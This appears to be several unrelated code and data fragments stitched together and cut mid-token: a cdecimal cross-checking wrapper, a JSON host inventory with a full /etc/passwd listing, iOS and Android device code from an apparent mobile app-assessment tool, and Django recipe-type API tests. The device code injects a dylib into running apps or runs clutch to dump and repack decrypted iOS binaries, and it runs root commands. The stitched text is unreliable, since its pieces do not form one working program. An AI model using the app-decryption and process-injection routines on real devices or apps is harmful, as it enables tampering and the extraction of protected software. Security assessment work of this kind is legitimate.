context.clear_status() c = cdec() other_mpd = other_dec = other if isinstance(other, cdec): other_mpd = other.mpd other_dec = other.dec c.mpd = getattr(self.mpd, funcname)(other_mpd) c.dec = getattr(context.d, funcname)(self.dec, other_dec) c.verify(funcname, (self, other)) return c def obj_binaryfunc(self, other, funcname): "binary function returning an object other than a cdec" context.clear_status() other_mpd = other_dec = other if isinstance(other, cdec): other_mpd = other.mpd other_dec = other.dec r_mpd = getattr(self.mpd, funcname)(other_mpd) r_dec = getattr(self.dec, funcname)(other_dec) verify((r_mpd, r_dec), funcname, (self, other)) return r_mpd def ternaryfunc(self, other, third, funcname): "ternary function returning a cdec" context.clear_status() c = cdec() other_mpd = other_dec = other if isinstance(other, cdec): other_mpd = other.mpd other_dec = other.dec third_mpd = third_dec = third if isinstance(third, cdec): third_mpd = third.mpd third_dec = third.dec c.mpd = getattr(self.mpd, funcname)(other_mpd, third_mpd) c.dec = getattr(self.dec, funcname)(other_dec, third_dec) c.verify(funcname, (self, other, third)) return c def __abs__(self): return self.unaryfunc('__abs__') def __add__(self, other): return self.binaryfunc(other, '__add__') def __copy__(self): return self.unaryfunc('__copy__') def __deepcopy__(self, memo=None): context.clear_status() c = cdec() c.mpd = self.mpd.__deepcopy__(memo) c.dec = self.dec.__deepcopy__(memo) c.verify('__deepcopy__', (self,)) return c def __div__(self, other): return self.binaryfunc(other, '__div__') def __divmod__(self, other): context.clear_status() q = cdec() r = cdec() other_mpd = other_dec = other if isinstance(other, cdec): other_mpd = other.mpd other_dec = other.dec q.mpd, r.mpd = self.mpd.__divmod__(other_mpd) q.dec, r.dec = self.dec.__divmod__(other_dec, context.d) q.verify('__divmod__', (self, other)) r.verify('__divmod__', (self, other)) return (q, r) def __eq__(self, other): return self.obj_binaryfunc(other, '__eq__') def __float__(self): if (self.mpd.is_nan() and self.dec.is_nan()): return float("NaN") try: return self.obj_unaryfunc('__float__') except ValueError: return None def __floordiv__(self, other): return self.binaryfunc(other, '__floordiv__') def __ge__(self, other): return self.obj_binaryfunc(other, '__ge__') def __gt__(self, other): return self.obj_binaryfunc(other, '__gt__') def __hash__(self): global PY25_HASH_HAVE_WARNED if self.mpd.is_snan() or (py_minor <= 6 and self.mpd.is_nan()): return None # for testing raise ValueError('Cannot hash a NaN value.') ret = None try: # Python 2.5 can use exorbitant amounts of memory ret = self.obj_unaryfunc('__hash__') except MemoryError: if not PY25_HASH_HAVE_WARNED: sys.stderr.write("Out of memory while hashing %s: upgrade to Python 2.6\n" % str(self.mpd)) PY25_HASH_HAVE_WARNED = 1 return ret def __int__(self): # ValueError or OverflowError if self.mpd.is_special(): return (None, None) return self.obj_unaryfunc('__int__') def __le__(self, other): return self.obj_binaryfunc(other, '__le__') def __long__(self): # ValueError or OverflowError if self.mpd.is_special(): return (None, None) return self.obj_unaryfunc('__long__') def __lt__(self, other): return self.obj_binaryfunc(other, '__lt__') def __mod__(self, other): return self.binaryfunc(other, '__mod__') def __mul__(self, other): return self.binaryfunc(other, '__mul__') def __ne__(self, other): return self.obj_binaryfunc(other, '__ne__') def __neg__(self):
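# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original file): intended use of the
# cdec wrapper above. Every arithmetic call runs through both cdecimal and
# decimal.py, compares string/tuple representations and context flags, and
# raises CdecException on any disagreement not covered by the known-
# disagreement handlers. Assumes the module-level `context` object used
# throughout this file has already been configured.
def _cdec_smoke_test():
    a = cdec("1.2345")
    b = cdec("7")
    s = a + b                 # binaryfunc -> verify('__add__', (a, b))
    q, r = divmod(a, b)       # both quotient and remainder are verified
    _ = abs(s)                # unaryfunc -> verify('__abs__', (s,))
    return str(s.mpd), str(q.mpd), str(r.mpd)
# ---------------------------------------------------------------------------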
"stepping": "3", "mhz": "3419.000", "cache_size": "6144 KB", "physical_id": "0", "core_id": "2", "cores": "4", "flags": [ "fpu", "vme", "de", "pse", "tsc", "msr", "pae", "mce", "cx8", "apic", "sep", "mtrr", "pge", "mca", "cmov", "pat", "pse36", "clflush", "dts", "acpi", "mmx", "fxsr", "sse", "sse2", "ss", "ht", "tm", "pbe", "syscall", "nx", "pdpe1gb", "rdtscp", "lm", "constant_tsc", "arch_perfmon", "pebs", "bts", "rep_good", "nopl", "xtopology", "nonstop_tsc", "aperfmperf", "eagerfpu", "pni", "pclmulqdq", "dtes64", "monitor", "ds_cpl", "vmx", "smx", "est", "tm2", "ssse3", "sdbg", "fma", "cx16", "xtpr", "pdcm", "pcid", "sse4_1", "sse4_2", "x2apic", "movbe", "popcnt", "tsc_deadline_timer", "aes", "xsave", "avx", "f16c", "rdrand", "lahf_lm", "abm", "epb", "tpr_shadow", "vnmi", "flexpriority", "ept", "vpid", "fsgsbase", "tsc_adjust", "bmi1", "avx2", "smep", "bmi2", "erms", "invpcid", "xsaveopt", "dtherm", "ida", "arat", "pln", "pts" ] }, "5": { "vendor_id": "GenuineIntel", "family": "6", "model": "60", "model_name": "Intel(R) Core(TM) i7-4800MQ CPU @ 2.70GHz", "stepping": "3", "mhz": "2752.569", "cache_size": "6144 KB", "physical_id": "0", "core_id": "2", "cores": "4", "flags": [ "fpu", "vme", "de", "pse", "tsc", "msr", "pae", "mce", "cx8", "apic", "sep", "mtrr", "pge", "mca", "cmov", "pat", "pse36", "clflush", "dts", "acpi", "mmx", "fxsr", "sse", "sse2", "ss", "ht", "tm", "pbe", "syscall", "nx", "pdpe1gb", "rdtscp", "lm", "constant_tsc", "arch_perfmon", "pebs", "bts", "rep_good", "nopl", "xtopology", "nonstop_tsc", "aperfmperf", "eagerfpu", "pni", "pclmulqdq", "dtes64", "monitor", "ds_cpl", "vmx", "smx", "est", "tm2", "ssse3", "sdbg", "fma", "cx16", "xtpr", "pdcm", "pcid", "sse4_1", "sse4_2", "x2apic", "movbe", "popcnt", "tsc_deadline_timer", "aes", "xsave", "avx", "f16c", "rdrand", "lahf_lm", "abm", "epb", "tpr_shadow", "vnmi", "flexpriority", "ept", "vpid", "fsgsbase", "tsc_adjust", "bmi1", "avx2", "smep", "bmi2", "erms", "invpcid", "xsaveopt", "dtherm", "ida", "arat", "pln", "pts" ] }, "6": { "vendor_id": "GenuineIntel", "family": "6", "model": "60", "model_name": "Intel(R) Core(TM) i7-4800MQ CPU @ 2.70GHz", "stepping": "3", "mhz": "2953.619", "cache_size": "6144 KB", "physical_id": "0", "core_id": "3", "cores": "4", "flags": [ "fpu", "vme", "de", "pse", "tsc", "msr", "pae", "mce", "cx8", "apic", "sep", "mtrr", "pge", "mca", "cmov", "pat", "pse36", "clflush", "dts", "acpi", "mmx", "fxsr", "sse", "sse2", "ss", "ht", "tm", "pbe", "syscall", "nx", "pdpe1gb", "rdtscp", "lm", "constant_tsc", "arch_perfmon", "pebs", "bts", "rep_good", "nopl", "xtopology", "nonstop_tsc", "aperfmperf", "eagerfpu", "pni", "pclmulqdq", "dtes64", "monitor", "ds_cpl", "vmx", "smx", "est", "tm2", "ssse3", "sdbg", "fma", "cx16", "xtpr", "pdcm", "pcid", "sse4_1", "sse4_2", "x2apic", "movbe", "popcnt", "tsc_deadline_timer", "aes", "xsave", "avx", "f16c", "rdrand", "lahf_lm", "abm", "epb", "tpr_shadow", "vnmi", "flexpriority", "ept", "vpid", "fsgsbase", "tsc_adjust", "bmi1", "avx2", "smep", "bmi2", "erms", "invpcid", "xsaveopt", "dtherm", "ida", "arat", "pln", "pts" ] }, "7": { "vendor_id": "GenuineIntel", "family": "6", "model": "60", "model_name": "Intel(R) Core(TM) i7-4800MQ CPU @ 2.70GHz", "stepping": "3", "mhz": "2927.087", "cache_size": "6144 KB", "physical_id": "0", "core_id": "3", "cores": "4", "flags": [ "fpu", "vme", "de", "pse", "tsc", "msr", "pae", "mce", "cx8", "apic", "sep", "mtrr", "pge", "mca", "cmov", "pat", "pse36", "clflush", "dts", "acpi", "mmx", "fxsr", "sse", "sse2", "ss", "ht", "tm", "pbe", 
"syscall", "nx", "pdpe1gb", "rdtscp", "lm", "constant_tsc", "arch_perfmon", "pebs", "bts", "rep_good", "nopl", "xtopology", "nonstop_tsc", "aperfmperf", "eagerfpu", "pni", "pclmulqdq", "dtes64", "monitor", "ds_cpl", "vmx", "smx", "est", "tm2", "ssse3", "sdbg", "fma", "cx16", "xtpr", "pdcm", "pcid", "sse4_1", "sse4_2", "x2apic", "movbe", "popcnt", "tsc_deadline_timer", "aes", "xsave", "avx", "f16c", "rdrand", "lahf_lm", "abm", "epb", "tpr_shadow", "vnmi", "flexpriority", "ept", "vpid", "fsgsbase", "tsc_adjust", "bmi1", "avx2", "smep", "bmi2", "erms", "invpcid", "xsaveopt", "dtherm", "ida", "arat", "pln", "pts" ] }, "total": 8, "real": 1, "cores": 4 }, "etc": { "passwd": { "root": { "dir": "/root", "gid": 0, "uid": 0, "shell": "/bin/bash", "gecos": "root" }, "bin": { "dir": "/bin", "gid": 1, "uid": 1, "shell": "/sbin/nologin", "gecos": "bin" }, "daemon": { "dir": "/sbin", "gid": 2, "uid": 2, "shell": "/sbin/nologin", "gecos": "daemon" }, "adm": { "dir": "/var/adm", "gid": 4, "uid": 3, "shell": "/sbin/nologin", "gecos": "adm" }, "lp": { "dir": "/var/spool/lpd", "gid": 7, "uid": 4, "shell": "/sbin/nologin", "gecos": "lp" }, "sync": { "dir": "/sbin", "gid": 0, "uid": 5, "shell": "/bin/sync", "gecos": "sync" }, "shutdown": { "dir": "/sbin", "gid": 0, "uid": 6, "shell": "/sbin/shutdown", "gecos": "shutdown" }, "halt": { "dir": "/sbin", "gid": 0, "uid": 7, "shell": "/sbin/halt", "gecos": "halt" }, "mail": { "dir": "/var/spool/mail", "gid": 12, "uid": 8, "shell": "/sbin/nologin", "gecos": "mail" }, "operator": { "dir": "/root", "gid": 0, "uid": 11, "shell": "/sbin/nologin", "gecos": "operator" }, "games": { "dir": "/usr/games", "gid": 100, "uid": 12, "shell": "/sbin/nologin", "gecos": "games" }, "ftp": { "dir": "/var/ftp", "gid": 50, "uid": 14, "shell": "/sbin/nologin", "gecos": "FTP User" }, "nobody": { "dir": "/", "gid": 99, "uid": 99, "shell": "/sbin/nologin", "gecos": "Nobody" }, "avahi-autoipd": { "dir": "/var/lib/avahi-autoipd", "gid": 170, "uid": 170, "shell": "/sbin/nologin", "gecos": "Avahi IPv4LL Stack" }, "dbus": { "dir": "/", "gid": 81, "uid": 81, "shell": "/sbin/nologin", "gecos": "System message bus" }, "polkitd": { "dir": "/", "gid": 999, "uid": 999, "shell": "/sbin/nologin", "gecos": "User for polkitd" }, "abrt": { "dir": "/etc/abrt", "gid": 173, "uid": 173, "shell": "/sbin/nologin", "gecos": "" }, "usbmuxd": { "dir": "/", "gid": 113, "uid": 113, "shell": "/sbin/nologin", "gecos": "usbmuxd user" }, "colord": { "dir": "/var/lib/colord", "gid": 998, "uid": 998, "shell": "/sbin/nologin", "gecos": "User for colord" }, "geoclue": { "dir": "/var/lib/geoclue", "gid": 997, "uid": 997, "shell": "/sbin/nologin", "gecos": "User for geoclue" }, "rpc": { "dir": "/var/lib/rpcbind", "gid": 32, "uid": 32, "shell": "/sbin/nologin", "gecos": "Rpcbind Daemon" }, "rpcuser": { "dir": "/var/lib/nfs", "gid": 29, "uid": 29, "shell": "/sbin/nologin", "gecos": "RPC Service User" }, "nfsnobody": { "dir": "/var/lib/nfs", "gid": 65534, "uid": 65534, "shell": "/sbin/nologin", "gecos": "Anonymous NFS User" }, "qemu": { "dir": "/", "gid": 107, "uid": 107, "shell": "/sbin/nologin", "gecos": "qemu user" }, "rtkit": { "dir": "/proc", "gid": 172, "uid": 172, "shell": "/sbin/nologin", "gecos": "RealtimeKit" }, "radvd": { "dir": "/", "gid": 75, "uid": 75, "shell": "/sbin/nologin", "gecos": "radvd user" }, "tss": { "dir": "/dev/null", "gid": 59, "uid": 59, "shell": "/sbin/nologin", "gecos": "Account used by the trousers package to sandbox the tcsd daemon" }, "unbound": { "dir": "/etc/unbound", "gid": 995, "uid": 996, 
"shell": "/sbin/nologin", "gecos": "Unbound DNS resolver" }, "openvpn": { "dir": "/etc/openvpn", "gid": 994, "uid": 995, "shell": "/sbin/nologin", "gecos": "OpenVPN" }, "saslauth": { "dir": "/run/saslauthd", "gid": 76, "uid": 994, "shell": "/sbin/nologin", "gecos": "\"Saslauthd user\"" }, "avahi": { "dir": "/var/run/avahi-daemon", "gid": 70, "uid": 70, "shell": "/sbin/nologin", "gecos": "Avahi mDNS/DNS-SD Stack" }, "pulse": { "dir": "/var/run/pulse", "gid": 992, "uid": 993, "shell": "/sbin/nologin", "gecos": "PulseAudio System Daemon" }, "gdm": { "dir": "/var/lib/gdm", "gid": 42, "uid": 42, "shell": "/sbin/nologin", "gecos": "" }, "gnome-initial-setup": { "dir": "/run/gnome-initial-setup/", "gid": 990, "uid": 992, "shell": "/sbin/nologin", "gecos": "" }, "nm-openconnect": { "dir": "/", "gid": 989, "uid": 991, "shell": "/sbin/nologin", "gecos": "NetworkManager user for OpenConnect" }, "sshd": { "dir": "/var/empty/sshd", "gid": 74, "uid": 74, "shell": "/sbin/nologin", "gecos": "Privilege-separated SSH" }, "chrony": { "dir": "/var/lib/chrony", "gid": 988, "uid": 990, "shell": "/sbin/nologin", "gecos": "" }, "tcpdump": { "dir": "/", "gid": 72, "uid": 72, "shell": "/sbin/nologin", "gecos": "" }, "some_user": { "dir": "/home/some_user", "gid": 1000, "uid": 1000, "shell": "/bin/bash", "gecos": "some_user" }, "systemd-journal-gateway": { "dir": "/var/log/journal", "gid": 191, "uid": 191, "shell": "/sbin/nologin", "gecos": "Journal Gateway" }, "postgres": { "dir": "/var/lib/pgsql", "gid": 26, "uid": 26, "shell": "/bin/bash", "gecos": "PostgreSQL Server" }, "dockerroot": { "dir": "/var/lib/docker", "gid": 977, "uid": 984, "shell": "/sbin/nologin", "gecos": "Docker User" }, "apache": { "dir": "/usr/share/httpd", "gid": 48, "uid": 48, "shell": "/sbin/nologin", "gecos": "Apache" }, "systemd-network": { "dir": "/", "gid": 974, "uid": 982, "shell": "/sbin/nologin", "gecos": "systemd Network Management" }, "systemd-resolve": { "dir": "/", "gid": 973, "uid": 981, "shell": "/sbin/nologin", "gecos": "systemd Resolver" }, "systemd-bus-proxy": { "dir": "/", "gid": 972, "uid": 980, "shell": "/sbin/nologin", "gecos": "systemd Bus Proxy" }, "systemd-journal-remote": { "dir": "//var/log/journal/remote", "gid": 970, "uid": 979, "shell": "/sbin/nologin", "gecos": "Journal Remote" }, "systemd-journal-upload": { "dir": "//var/log/journal/upload", "gid": 969, "uid": 978, "shell": "/sbin/nologin", "gecos": "Journal Upload" }, "setroubleshoot": { "dir": "/var/lib/setroubleshoot", "gid": 967, "uid": 977, "shell": "/sbin/nologin", "gecos": "" }, "oprofile": { "dir": "/var/lib/oprofile", "gid": 16, "uid": 16, "shell": "/sbin/nologin", "gecos": "Special user account to be used by OProfile" } }, "group": { "root": { "gid": 0, "members": [ ] }, "bin": { "gid": 1, "members": [ ] }, "daemon": { "gid": 2, "members": [ ] }, "sys": { "gid": 3, "members": [ ] }, "adm": { "gid": 4, "members": [ "logcheck" ] }, "tty": { "gid": 5, "members": [ ] }, "disk": { "gid": 6, "members": [ ] }, "lp": { "gid": 7, "members": [ ] }, "mem": { "gid": 8, "members": [ ] }, "kmem": { "gid": 9, "members":
= okey = None for line in result.replace("\r\n", "\n").split("\n"): # Found new item if "--------" in line: if keychain_data: keychain_data[key] = self._translate_keychain_value( "\n".join(value.split("\n")[:-2])) keychain += [keychain_data] keychain_data = {} key = value = okey = None # Look for new key for k in keys: if line.startswith(k): if key: keychain_data[key] = self._translate_keychain_value( value) key = k[:-2].lower().replace(" ", "_") value = line.split(k)[-1] okey = k # if value already parsed because of first line if okey: okey = None else: value = "{}{}\n".format(value, line) return keychain return _keychain_data() def install(self, ipa_file_path): """ Installs an IPA app on the remote device :param str ipa_file_path: the path tot he local IPA file :return: the result of installing the app """ @_requires_ios_binary(self, "appinst") @_requires_ios_package(self, "net.angelxwind.appsyncunified") def _install(ipa_file_path): filename = ipa_file_path.rsplit("/", 1)[-1] remote_ipa_file = "/tmp/{}".format(filename.replace(" ", "_")) # prepare filename ipa_file_path = ipa_file_path.replace(" " , "\ ") self.put(ipa_file_path, remote_ipa_file) result = self.execute( "appinst {}".format(remote_ipa_file))[0] # update app list self.execute("uicache") return result return _install(ipa_file_path) def find_files(self, paths): """ Returns a list of files in the selecged paths :param str paths: the root paths to start looking for files from - these can be seperated by space for multiple file paths :return: list with the found files """ @_requires_ios_binary(self, "find") def _find_files(paths): return self.execute("find {} -type f".format(paths))[0].split("\n") return _find_files(paths) def processes(self): """ Returns a list of running processes, their users and pids :return: a list of dicts of processes """ @_requires_ios_binary(self, "ps") def _processes(): from scrounger.utils.general import remove_multiple_spaces processes_list = [] for process in self.execute("ps aux")[0].split("\n"): if not process: continue process = remove_multiple_spaces(process.strip()) fields = process.split(" ") app_user = fields[0] app_pid = fields[1] # if the app has spaces in the name app_name = " ".join(fields[10:]) processes_list += [{ "name": app_name, "user": app_user, "pid": app_pid }] return processes_list return _processes() def repositories(self): """ Returns a list of repositories added to APT / Cydia :return: a list with the repositories URLS """ @_requires_ios_binary(self, "apt") def _repositories(): repositories_list = [] for line in self.execute( "grep -R deb /etc/apt/sources.list.d/")[0].split("\n"): if line: line_split = line.strip().split(":",1)[-1].split(" ") repositories_list += [line_split[1]] return repositories_list return _repositories() # ************************************************************************** # Applications functions # ************************************************************************** def pid(self, app_id): """ Returns the PID of a running application :param str app_id: the identifier of the app to get the PID from :return int: a PID if the app with app_id is running or None if not """ apps = self.apps() if app_id not in apps: _Log.debug("App {} is not installed on the device".format(app_id)) return None install_path = apps[app_id]["application"] processes = self.processes() for process in processes: if install_path.rsplit("/", 1)[-1].lower() in \ process["name"].lower(): return int(process["pid"]) return None def stop(self, app_id): """ Kills an application 
on the connected device :param str app_id: the application identifier :return: nothing """ pid = self.pid(app_id) if pid: self.execute("kill -9 {}".format(pid)) def start(self, app_id): """ Starts an application on the connected device :param str app_id: the application identifier :return: the result of opening the app """ # com.conradkramer.open # iOS 11 - https://github.com/GaryniL/Open/releases # https://github.com/insidegui/launchapp/ bundled in listapps @_requires_ios_binary(self, "listapps") def _start(app_id): return self.execute("listapps -o {}".format(app_id)) return _start(app_id) def pull_data_contents(self, data_path, local_path): """ Gets an application's data from the device to a local path :param str data_path: the path to the application's data :param str local_path: the destination path :return: nothing """ @_requires_ios_binary(self, "find") def _pull_data_contents(data_path, local_path): #from scrounger.utils.general import execute data_files = self.execute("find {} -type f".format(data_path))[0] for data_file in data_files.split("\n"): local_file_path = "{}{}".format(local_path, data_file.replace(data_path, "")) # NO NEED TO DO IT - get is now responsible for it # create destination folders if they don't exist #execute("mkdir -p {}".format( # local_file_path.rsplit("/", 1)[0])) # copy files self.get(data_file, local_file_path) return _pull_data_contents(data_path, local_path) def decrypt_binary(self, app_id): """ Decrypt the binary of the application only :param str app_id: the application identifier of the app to decrypt :return: returns the remote path where the application was decrypted to or None if it failed """ output = self._decrypt_app_helper(app_id, "-b") if "Finished dumping" in output: return "{}/{}".format(output.rsplit(" to ", 1)[1].split("\n")[0], app_id) return None def decrypt(self, app_id): """ Decrypt the binary of the application and packs the application into an ipa file :param str app_id: the application identifier of the app to decrypt :return: returns the remote path where the application was packed into or None if it failed """ output = self._decrypt_app_helper(app_id, "-d") if "DONE: " in output: return output.split("DONE: ", 1)[1].split("\n")[0] return None def _uncrypt_app_helper(self, app_id, decrypt_type): """ Decrypts an app using uncrypt11 and returns the result output :param str app_id: the id of the app to be decrypted :param str decrypt_type: the type of decryption to be done - either binary only (-b) or packed into ipa (-d) :return: returns the output of the decryption """ from time import sleep uncrypt_path = "/Library/MobileSubstrate/DynamicLibraries/\ uncrypt11.dylib" if not self.file_exists(uncrypt_path): _Log.debug("Uncrypt11 not found") return "FAIL: Uncrypt11 not installed." self.start(app_id) # start app - needs to be running sleep(5) # wait to start pid = self.pid(app_id) # get pid if not pid: _Log.debug("PID not found") return "FAIL: Could not get PID of {}".format(app_id) result = self.execute("/electra/inject_criticald {} {}".format( pid, uncrypt_path)) if "No error occured!" not in result[0] and \ "No error occured!" 
not in result[1]: _Log.debug("Not decrypted:\n{}\n{}".format(result[0], results[1])) return "FAIL: An error occured trying to decrypt {}".format(app_id) list_apps = self.apps() app_info = list_apps[app_id] decrypted_binary = "{}/Documents/{}\ decrypted".format( app_info["data"], app_info["binary_name"]) if not self.file_exists(decrypted_binary): _Log.debug("File {} does not exist".format(decrypted_binary)) return "FAIL: Could not decrypt {}".format(app_id) # move binary to tmp end_path = "/tmp/{}.decrypted".format(app_id) self.execute("mv {} {}".format(decrypted_binary, end_path)) if decrypt_type == "-b": _Log.debug("Dumpped binary") return "Finished dumping {} to {}\n".format(app_id, end_path) _Log.debug("Creating IPA") # create IPA scructure self.execute("rm -rf /tmp/scrounger-tmp/Payload") self.execute("mkdir -p /tmp/scrounger-tmp/Payload") # copy App to /tmp self.execute("cp -r {} /tmp/scrounger-tmp/Payload".format( app_info["application"])) # move decrypted binary to the Payload app_name = app_info["application"].rsplit("/", 1)[-1] self.execute("mv {} /tmp/scrounger-tmp/Payload/{}/{}".format( end_path, app_name, app_info["binary_name"])) # zip everything self.execute("cd /tmp/scrounger-tmp; zip -r ../{}.ipa Payload/".format( app_id)) # cleanup self.execute("rm -rf /tmp/scrounger-tmp") # Success: DONE: /path/to/ipa\n # Success: Finished dumping app_id to /path/to/dump/binary\n return "DONE: /tmp/{}.ipa\n".format(app_id) def _decrypt_app_helper(self, app_id, decrypt_type): """ Decrypts an app and returns the result output :param str app_id: the id of the app to be decrypted :param str decrypt_type: the type of decryption to be done - either binary only (-b) or packed into ipa (-d) :return: returns the output of the decryption """ @_requires_ios_binary(self, "clutch") def _clutch_decrypt_app_helper(app_id, decrypt_type): from socket import timeout scrounger_clutch_log_file = "/tmp/scrounger-clutch.log" try: output = self.execute("clutch -n {} {} &> {}".format( decrypt_type, app_id, scrounger_clutch_log_file))[0] except timeout: _Log.debug("ssh command timedout.") output = self._cat_file(scrounger_clutch_log_file) # cleanup log file self._rm_file(scrounger_clutch_log_file) return output ios_version = self.system_version() if ios_version.startswith("11."): return self._uncrypt_app_helper(app_id, decrypt_type) # ios < 11 use clutch return _clutch_decrypt_app_helper(app_id, decrypt_type) from scrounger.utils.android import _adb_command class AndroidDevice(BaseDevice): """ This class will be used as a bridge between the host and the android device """ _device_id = None def __init__(self, device_id): """ Creates an object that will be a wrapper to interact with the android device. It also checks if the device trusts the host. 
""" from scrounger.utils.android import devices from scrounger.utils.general import UnauthorizedDevice self._device_id = device_id devices_list = devices() if self._device_id not in devices_list or\ devices_list[self._device_id] == "unauthorized": raise UnauthorizedDevice( "The device {} does not trust this host.".format( self._device_id)) def __str__(self): """Returns a string representation of the device""" return "Android Device ({})".format(self.device_id()) def device_id(self): """ Returns the device ID """ return self._device_id def execute(self, command): """ Executes a command on the target device :param str command: the command to be executed :return: stdout and stderr of the executed command """ # log command that is going to be run _Log.debug("Running: {}".format(command)) return _adb_command("-s {} shell {}".format(self._device_id, command)) def root_execute(self, command, single_quoted=True): """ Executes a command on the target device as root :param str command: the command to execute :return: stdout and stderr from the executed command """ @_requires_android_binary(self, "su") def _root_execute(command, single_quoted): if single_quoted: command = "'{}'".format(command.replace("'", "\'")) return self.execute("su -c {}".format(command)) return _root_execute(command,
self.job_type2.name, 'job_type_version': self.job_type2.version, 'job_type_revision': self.job_type2.revision_num}}}} json_data = { 'name': 'not-a-name', 'definition': new_definition } url = '/%s/recipe-types/validation/' % self.api response = self.client.generic('POST', url, json.dumps(json_data), 'application/json') self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) results = json.loads(response.content) self.assertTrue(results['is_valid']) warnings = [] self.assertDictEqual(results, {u'errors': [], u'is_valid': True, u'warnings': warnings, u'diff': {}}) def test_mismatched_warning(self): """Tests validating a new recipe type.""" main_definition = copy.deepcopy(recipe_test_utils.RECIPE_DEFINITION) main_definition['input']['files'][0]['media_types'] = ['image/tiff'] main_definition['nodes']['node_a']['node_type']['job_type_name'] = self.job_type2.name main_definition['nodes']['node_a']['node_type']['job_type_version'] = self.job_type2.version main_definition['nodes']['node_a']['node_type']['job_type_revision'] = self.job_type2.revision_num main_definition['nodes']['node_b']['node_type']['job_type_name'] = self.job_type2.name main_definition['nodes']['node_b']['node_type']['job_type_version'] = self.job_type2.version main_definition['nodes']['node_b']['node_type']['job_type_revision'] = self.job_type2.revision_num main_definition['nodes']['node_d']['node_type']['recipe_type_name'] = self.recipe_type1.name main_definition['nodes']['node_d']['node_type']['recipe_type_revision'] = self.recipe_type1.revision_num json_data = { 'definition': main_definition } url = '/%s/recipe-types/validation/' % self.api response = self.client.generic('POST', url, json.dumps(json_data), 'application/json') self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) results = json.loads(response.content) self.assertTrue(results['is_valid']) warnings = [{u'name': u'MISMATCHED_MEDIA_TYPES', u'description': u"Parameter 'INPUT_IMAGE' might not accept [image/tiff]"}] self.assertDictEqual(results, {u'errors': [], u'is_valid': True, u'warnings': warnings, u'diff': {}}) def test_recipeception(self): """Tests validating a recipe type with a sub-recipe of itself""" main_definition = self.recipe_type1.get_v6_definition_json() main_definition['nodes']['recipetype_1'] = { 'dependencies': [], 'input': {}, 'node_type': { 'node_type': 'recipe', 'recipe_type_name': self.recipe_type1.name, 'recipe_type_revision': self.recipe_type1.revision_num } } json_data = { 'name': self.recipe_type1.name, 'definition': main_definition } url = '/%s/recipe-types/validation/' % self.api response = self.client.generic('POST', url, json.dumps(json_data), 'application/json') self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) results = json.loads(response.content) self.assertFalse(results['is_valid']) error_msg = u'Recipe type %s contains sub-recipes of itself. Found within recipe type %s.' 
% (self.recipe_type1.name, self.recipe_type1.name) error = [{u'name': u'RECURSIVE_SUBRECIPES', u'description': error_msg}] self.assertEqual(results['errors'], error) # recipeceiption more than one layer in: A -> B -> A sub_definition = copy.deepcopy(self.sub_definition) sub_definition['nodes']['recipetype_1'] = { 'dependencies': [], 'input': {}, 'node_type': { 'node_type': 'recipe', 'recipe_type_name': self.recipe_type1.name, 'recipe_type_revision': self.recipe_type1.revision_num } } subrecipe_type = recipe_test_utils.create_recipe_type_v6(definition=sub_definition, name='sub-sub-recipe', title='Sub Sub Recipe', description="A sub sub recipe", is_active=False, is_system=False) main_definition = self.recipe_type1.get_v6_definition_json() main_definition['nodes']['sub_sub'] = { 'dependencies': [], 'input': {}, 'node_type': { 'node_type': 'recipe', 'recipe_type_name': subrecipe_type.name, 'recipe_type_revision': subrecipe_type.revision_num } } json_data = { 'name': self.recipe_type1.name, 'definition': main_definition } url = '/%s/recipe-types/validation/' % self.api response = self.client.generic('POST', url, json.dumps(json_data), 'application/json') self.assertEqual(response.status_code, status.HTTP_200_OK, response.content) results = json.loads(response.content) self.assertFalse(results['is_valid']) error_msg = u'Recipe type %s contains sub-recipes of itself. Found within recipe type %s.' % (self.recipe_type1.name, subrecipe_type.name) error = [{u'name': u'RECURSIVE_SUBRECIPES', u'description': error_msg}] self.assertEqual(results['errors'], error) class TestRecipesViewV6(APITransactionTestCase): api = 'v6' def setUp(self): django.setup() rest.login_client(self.client, is_staff=True) self.date_1 = datetime.datetime(2016, 1, 1, tzinfo=utc) self.date_2 = datetime.datetime(2016, 1, 2, tzinfo=utc) self.date_3 = datetime.datetime(2016, 1, 2, tzinfo=utc) self.date_4 = datetime.datetime(2016, 1, 3, tzinfo=utc) self.s_class = 'A' self.s_sensor = '1' self.collection = '12345' self.task = 'abcd' self.s_class2 = 'B' self.s_sensor2 = '2' self.collection2 = '123456' self.task2 = 'abcde' manifest = copy.deepcopy(job_test_utils.COMPLETE_MANIFEST) manifest['job']['name'] = 'scale-batch-creator' self.job_type1 = job_test_utils.create_seed_job_type(manifest=manifest) self.jt2 = job_test_utils.create_seed_job_type(manifest=job_test_utils.MINIMUM_MANIFEST) def_v6_dict_sub = {'version': '6', 'input': { 'files': [], 'json': []}, 'nodes': {'node_a': {'dependencies': [], 'input': {}, 'node_type': {'node_type': 'job', 'job_type_name': self.jt2.name, 'job_type_version': self.jt2.version, 'job_type_revision': self.jt2.revision_num}}}} self.sub = recipe_test_utils.create_recipe_type_v6(definition=def_v6_dict_sub) def_v6_dict = {'version': '6', 'input': {'files': [{'name': 'INPUT_FILE', 'media_types': ['image/tiff'], 'required': True, 'multiple': True}], 'json': [{'name': 'INPUT_JSON', 'type': 'string', 'required': True}]}, 'nodes': {'node_a': {'dependencies': [], 'input': {'INPUT_FILE': {'type': 'recipe', 'input': 'INPUT_FILE'}, 'INPUT_JSON': {'type': 'recipe', 'input': 'INPUT_JSON'}}, 'node_type': {'node_type': 'job', 'job_type_name': self.job_type1.name, 'job_type_version': self.job_type1.version, 'job_type_revision': 1}}, 'node_b': {'dependencies': [], 'input': {}, 'node_type': {'node_type': 'recipe', 'recipe_type_name': self.sub.name, 'recipe_type_revision': self.sub.revision_num}} } } self.workspace = storage_test_utils.create_workspace() self.file1 = storage_test_utils.create_file(workspace=self.workspace, 
